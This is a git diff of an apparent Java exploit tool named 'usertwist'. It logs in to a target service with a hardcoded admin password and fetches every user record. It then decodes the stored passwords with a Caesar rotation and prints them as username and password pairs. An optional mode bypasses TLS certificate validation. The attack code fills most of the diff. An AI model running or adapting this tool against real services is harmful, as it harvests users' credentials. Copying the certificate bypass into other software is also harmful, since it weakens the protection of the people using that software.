Simplified elapsed time calculating

Typo fixed
Asynchronous passwords parsing
2024-08-02 10:57:33 +02:00 · 2024-08-02 10:47:28 +02:00 · 2024-08-02 09:02:11 +02:00
4 changed files with 38 additions and 41 deletions
--- a/src/fr/motysten/usertwist/exploit/Main.java
+++ b/src/fr/motysten/usertwist/exploit/Main.java
@@ -24,14 +24,12 @@ public class Main {
    public static String password = "AdminSecret1C";
    public static String port = "443";
    public static int rotation = 4;
+    public static boolean insecure = false;
    public static boolean asynchronous = true;
-    public static Request requestClient;

    public static void main(String[] args) throws IOException, InterruptedException, NoSuchAlgorithmException, KeyManagementException {
        BufferedReader reader = new BufferedReader(new InputStreamReader(System.in));

-        requestClient = new Request(false);
-
        if (Arrays.asList(args).contains("--synchronous") || Arrays.asList(args).contains("-s")) {
            asynchronous = false;
        }
@@ -71,7 +69,7 @@ public class Main {
        boolean tokenFound = false;
        while (!tokenFound) {
            try {
-                response = requestClient.get(link, port, "/login", requestJSON, null);
+                response = Request.get(link, port, "/login", requestJSON, null, insecure);
                if (response.statusCode() == 308) {
                    System.err.println("The server is trying to force HTTPS use. Would you like to retry with HTTPS ? [Y/n]");
                    if (reader.readLine().equalsIgnoreCase("n")) {
@@ -90,7 +88,7 @@ public class Main {
                    System.err.println("Operation aborted ! Security failure.");
                    System.exit(1);
                } else {
-                    requestClient = new Request(true);
+                    insecure = true;
                }
            } catch (SSLException e) {
                if (e.getMessage().contains("plaintext connection?")) {
@@ -110,6 +108,8 @@ public class Main {
            System.exit(1);
        }

+        System.out.println(response.statusCode());
+
        JSONObject responseObject = new JSONObject(response.body());
        String token = responseObject.optString("token");

@@ -124,7 +124,7 @@ public class Main {
        Map<String, String> headers = new HashMap<>();
        headers.put("Authorization", "Bearer " + token);

-        response = requestClient.get(link, port, "/references", requestJSON, headers);
+        response = Request.get(link, port, "/references", requestJSON, headers, insecure);
        JSONArray usersArray = new JSONArray(response.body());

        System.out.println(usersArray.length() + " users found !");
--- a/src/fr/motysten/usertwist/exploit/tools/Cesar.java
+++ b/src/fr/motysten/usertwist/exploit/tools/Cesar.java
@@ -1,33 +1,33 @@
 package fr.motysten.usertwist.exploit.tools;

-import java.util.stream.Collectors;
-
 public class Cesar {

-    public static String rotate(String input, int offset) {
-        char normalizeKey = (char) (offset % 26);
+    public static final String LOWER_ALPHABET = "abcdefghijklmnopqrstuvwxyz";
+    public static final String UPPER_ALPHABET = LOWER_ALPHABET.toUpperCase();

-        return input.chars()
-                .mapToObj(c -> (char) c)
-                .map(c -> {
-                    if (Character.isLetter(c)) {
-                        char base;
-                        if (Character.isUpperCase(c)) {
-                            base = 'A';
-                        } else {
-                            base = 'a';
-                        }
-                        if (offset < 0) {
-                            return (char) (base + (c - base + normalizeKey) % 26);
-                        } else {
-                            return (char) (base + (c - base - normalizeKey + 26) % 26);
-                        }
-                    } else {
-                        return c;
-                    }
-                })
-                .map(String::valueOf)
-                .collect(Collectors.joining());
+    public static String cesarRotate(String input, int offset) {
+
+        while (offset < 0) {
+            offset += 26;
+        }
+
+        StringBuilder output = new StringBuilder();
+        
+        for (int i = 0; i < input.length(); i++) {
+            char newChar = input.charAt(i);
+            if (!Character.isDigit(input.charAt(i))) {
+                int pos = LOWER_ALPHABET.indexOf(Character.toLowerCase(input.charAt(i)));
+                int newPos = (pos + offset) % 26;
+                if (Character.isUpperCase(input.charAt(i))) {
+                    newChar = UPPER_ALPHABET.charAt(newPos);
+                } else {
+                    newChar = LOWER_ALPHABET.charAt(newPos);
+                }
+            }
+            output.append(newChar);
+        }
+
+        return output.toString();
    }

 }
--- a/src/fr/motysten/usertwist/exploit/tools/Parser.java
+++ b/src/fr/motysten/usertwist/exploit/tools/Parser.java
@@ -9,7 +9,7 @@ public class Parser {
        for (int i = 0; i < usersArray.length(); i++) {
            JSONObject user = usersArray.getJSONObject(i);
            String login = user.getString("username");
-            String password = Cesar.rotate(user.getString("data"), rotation);
+            String password = Cesar.cesarRotate(user.getString("data"), rotation);

            System.out.println((i + 1) + ". " + login + " => " + password);
        }
@@ -23,7 +23,7 @@ public class Parser {
            new Thread(() -> {
                JSONObject user = usersArray.getJSONObject(finalI);
                String login = user.getString("username");
-                String password = Cesar.rotate(user.getString("data"), rotation);
+                String password = Cesar.cesarRotate(user.getString("data"), rotation);

                System.out.println((finalI + 1) + ". " + login + " => " + password);
            }).start();
--- a/src/fr/motysten/usertwist/exploit/tools/Request.java
+++ b/src/fr/motysten/usertwist/exploit/tools/Request.java
@@ -16,19 +16,16 @@ import java.util.Map;

 public class Request {

-    private final HttpClient client;
+    public static HttpResponse<String> get(String link, String port, String endpoint,JSONObject params, Map<String, String> headers, boolean insecure) throws NoSuchAlgorithmException, KeyManagementException, IOException, InterruptedException {
+        HttpClient client = HttpClient.newHttpClient();

-    public Request(boolean insecure) throws NoSuchAlgorithmException, KeyManagementException {
-        HttpClient.Builder builder = HttpClient.newBuilder();
        if (insecure) {
            SSLContext customContext = SSLContext.getInstance("TLS");
            customContext.init(null, new TrustManager[]{new SSLBypass()}, new SecureRandom());
-            builder.sslContext(customContext);
-        }
-        this.client = builder.build();
-    }

-    public HttpResponse<String> get(String link, String port, String endpoint,JSONObject params, Map<String, String> headers) throws IOException, InterruptedException {
+            client = HttpClient.newBuilder().sslContext(customContext).build();
+        }
+
        HttpRequest.Builder builder = HttpRequest.newBuilder(URI.create(link + ":" + port + endpoint));
        if (headers != null) {
            for (Map.Entry<String, String> header : headers.entrySet()) {
Author	SHA1	Message	Date
Mateo	a1e1caff5d	Simplified elapsed time calculating	2024-08-02 10:57:33 +02:00
Mateo	e22dec88a5	Typo fixed	2024-08-02 10:47:28 +02:00
Mateo	a757b08722	Asynchronous passwords parsing	2024-08-02 09:02:11 +02:00